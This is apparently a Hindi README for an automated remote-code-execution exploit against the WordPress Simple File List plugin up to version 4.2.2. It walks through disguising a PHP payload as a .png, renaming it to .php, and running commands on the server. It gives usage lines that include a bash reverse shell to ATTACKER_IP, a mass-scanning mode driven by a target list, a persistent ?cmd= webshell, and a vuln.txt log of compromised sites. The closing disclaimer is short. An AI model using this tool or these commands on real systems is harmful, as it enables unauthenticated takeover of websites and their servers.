
CVE-2025-34085 के लिए शोषण
CVE-2025-34085 (CVE-2020-36847 का डुप्लिकेट) के लिए एक स्वचालित एक्सप्लॉइट, जो WordPress Simple File List प्लगइन संस्करण ≤ 4.2.2 में एक गंभीर अनप्रमाणित रिमोट कोड निष्पादन भेद्यता है।
नोट: CVE-2025-34085 को MITRE द्वारा CVE-2020-36847 के डुप्लिकेट के रूप में अस्वीकार कर दिया गया था। भेद्यता वास्तविक है और संस्करण 4.2.3 में ठीक की गई है। दोनों CVE ID एक ही मूल मुद्दे को संदर्भित करते हैं।
| फ़ील्ड | विवरण |
|---|
| CVE | CVE-2025-34085 / CVE-2020-36847 |
| प्लगइन | Simple File List |
| प्रभावित संस्करण | ≤ 4.2.2 |
| फिक्स्ड संस्करण | 4.2.3 |
| प्रकार | असीमित फ़ाइल अपलोड → पुनर्नामकरण बायपास → RCE |
| CVSS | 9.8 (गंभीर) |
| प्रमाणीकरण | आवश्यक नहीं |
| मूल खोज | coiffeur |
| Metasploit मॉड्यूल | exploit/multi/http/wp_simple_file_list_rce |
अपलोड — एक PHP पेलोड को प्लगइन के अपलोड एंडपॉइंट (ee-upload-engine.php) के माध्यम से .png फ़ाइल के रूप में प्रच्छन्न करके अपलोड किया जाता है। अपलोड इंजन एक्सटेंशन को मान्य करता है लेकिन इमेज फ़ाइलों को स्वीकार करता है।
पुनर्नामकरण — प्लगइन की पुनर्नामकरण कार्यक्षमता (ee-file-engine.php) एक्सटेंशन प्रतिबंधों को लागू नहीं करती। हमलावर .png को .php (या .phtml, .php5, .php3) में नाम बदल देता है।
निष्पादन — पुनर्नामित PHP फ़ाइल अब /wp-content/uploads/simple-file-list/ निर्देशिका में सुलभ और निष्पादन योग्य हो जाती है, जिससे हमलावर को मनमाना कमांड निष्पादन मिलता है।
pip install requests colorama
Python 3.6+
python3 CVE-2025-34085.py -u http://target.com --cmd "id"
?cmd= पैरामीटर नहीं)python3 CVE-2025-34085.py -u http://target.com --cmd "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'" --inline
एक targets.txt फ़ाइल बनाएँ जिसमें प्रति पंक्ति एक URL हो:
http://target1.com
http://target2.com
https://target3.com
python3 CVE-2025-34085.py --cmd "id"
| तर्क | विवरण | डिफ़ॉल्ट |
|---|---|---|
-u, --url | एकल लक्ष्य URL | — |
--cmd | लक्ष्य पर निष्पादित करने के लिए कमांड | id |
--inline | कमांड को सीधे PHP शेल में इंजेक्ट करें (हार्डकोडेड, कोई ?cmd= वेबशेल नहीं) | False |
सुझाव: जब आपको रिवर्स शेल की आवश्यकता हो या जब लक्ष्य में क्वेरी स्ट्रिंग फ़िल्टरिंग हो, तो
--inlineका उपयोग करें।--inlineके बिना, एक्सप्लॉइट एक वेबशेल छोड़ता है जो?cmd=के माध्यम से कमांड स्वीकार करता है।
सफल एक्सप्लॉइट vuln.txt में लॉग होते हैं:
http://target.com | http://target.com/wp-content/uploads/simple-file-list/shell.php | uid=33(www-data) gid=33(www-data)
/wp-content/uploads/simple-file-list/<random>.php पर बना रहता हैvuln.txt में लॉग होते हैं — आपकी रिपोर्ट के लिए उपयोगी--inline का उपयोग रिवर्स शेल के साथ करें ताकि ?cmd= वाला स्थायी वेबशेल न छूटेSimple File List प्लगइन को संस्करण 4.2.3 या बाद के संस्करण में अपग्रेड करें।
यह उपकरण केवल अधिकृत पैठ परीक्षण और शैक्षिक उद्देश्यों के लिए है। कंप्यूटर सिस्टम में अनधिकृत पहुँच अवैध है। परीक्षण से पहले हमेशा उचित प्राधिकरण प्राप्त करें।